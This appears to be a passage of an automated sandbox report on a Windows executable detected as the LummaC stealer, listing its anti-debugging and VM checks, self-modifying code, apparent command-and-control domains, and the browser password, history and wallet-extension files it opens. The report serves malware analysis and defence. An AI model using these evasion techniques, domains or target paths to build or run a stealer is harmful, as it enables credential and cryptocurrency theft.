Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667E3D0 second address: 667E3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 66466F7 second address: 6646701 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAD0D216D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C1E9 second address: 667C1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C1EF second address: 667C1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C1F5 second address: 667C1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C1FC second address: 667C201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C35E second address: 667C362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C615 second address: 667C61B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667C79A second address: 667C7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CC0B second address: 667CC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CC0F second address: 667CC2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8600h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007FAD0CDA85F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CC2F second address: 667CC62 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAD0D216D5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007FAD0D216D5Ch 0x00000015 js 00007FAD0D216D56h 0x0000001b jno 00007FAD0D216D5Eh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 jnc 00007FAD0D216D56h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CE02 second address: 667CE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CE06 second address: 667CE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CE0B second address: 667CE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CE1A second address: 667CE20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CF55 second address: 667CF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667CF59 second address: 667CF63 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD0D216D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667D0CA second address: 667D0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667D0CE second address: 667D0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAD0D216D67h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667D0EB second address: 667D0FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667D4CA second address: 667D4EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FAD0D216D6Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667DD3A second address: 667DD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0CDA8604h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667DD53 second address: 667DD6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D67h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 667DEF2 second address: 667DEF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 1E8C16 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 3B0B2B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 1E8B5B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 41AC66 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 64DD92E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 64DD9C6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 66852FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 6683D6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 6683940 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Special instruction interceptor: First address: 668A503 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe TID: 7772	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe TID: 7936	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe TID: 7784	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe TID: 7776	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe TID: 7796	Thread sleep time: -30015s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: rwFNJ4pHWG.exe, 00000000.00000002.1728723402.000000000036D000.00000040.00000001.01000000.00000003.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1736455407.0000000006662000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: rwFNJ4pHWG.exe, 00000000.00000002.1731552437.0000000001207000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.00000000011D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005B02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: rwFNJ4pHWG.exe, 00000000.00000002.1728723402.000000000036D000.00000040.00000001.01000000.00000003.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1736455407.0000000006662000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: rwFNJ4pHWG.exe, 00000000.00000003.1438926613.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: NTICE
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: SICE
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: rwFNJ4pHWG.exe, 00000000.00000003.1359459023.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: mindhandru.buzz

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: rwFNJ4pHWG.exe, 00000000.00000002.1730273935.00000000003AE000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: <Program Manager
Source: rwFNJ4pHWG.exe, 00000000.00000002.1736455407.0000000006662000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: (aProgram Manager

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: rwFNJ4pHWG.exe, 00000000.00000003.1516391330.000000000128C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rwFNJ4pHWG.exe, 00000000.00000003.1513099686.000000000126F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: rwFNJ4pHWG.exe PID: 7704, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
